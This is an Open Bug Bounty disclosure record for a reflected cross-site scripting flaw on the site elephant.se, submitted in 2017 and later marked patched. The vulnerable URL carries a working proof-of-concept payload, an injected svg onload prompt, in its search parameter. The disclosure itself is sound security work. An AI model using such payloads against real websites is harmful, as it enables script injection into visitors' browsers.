elephant.se XSS vulnerability

2017-03-18T16:12:00
ID OBB:219586
Type openbugbounty
Reporter porthunter
Modified 2017-06-18T06:30:00

Description

Vulnerable URL:
http://www.elephant.se/google_search.php?domains=www.elephant.se&q=&sitesearch=www.elephant.se&client=pub-9171508190134279&forid=1&channel=6734127506&ie=ISO-8859-1&oe=ISO-8859-1&cof=GALT%3A%23008000%3BGL%3A1%3BDIV%3A%23336699%3BVLC%3A663399%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A336699%3BALC%3A0000FF%3BLC%3A0000FF%3BT%3A000000%3BGFNT%3A0000FF%3BGIMP%3A0000FF%3BLH%3A0%3BLW%3A0%3BL%3Ahttp%3A%2F%2Fwww.elephant.se%2Flogos%2Flogo.gif%3BS%3Ahttp%3A%2F%2Fwww.elephant-news.com%3BLP%3A1%3BFORID%3A11&hl=en&lang=en&q=%22%3E%3Csvg%2Fonload%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E&x=9&y=10
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1400108
VIP website status:| No
Check elephant.se SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 18 March, 2017 16:12 GMT
Generic security notifications sent to website owner| 18 March, 2017 16:14 GMT
Vulnerability details disclosed by researcher| 17 June, 2017 16:14 GMT
Vulnerability patched by the website owner| 18 June, 2017 06:30 GMT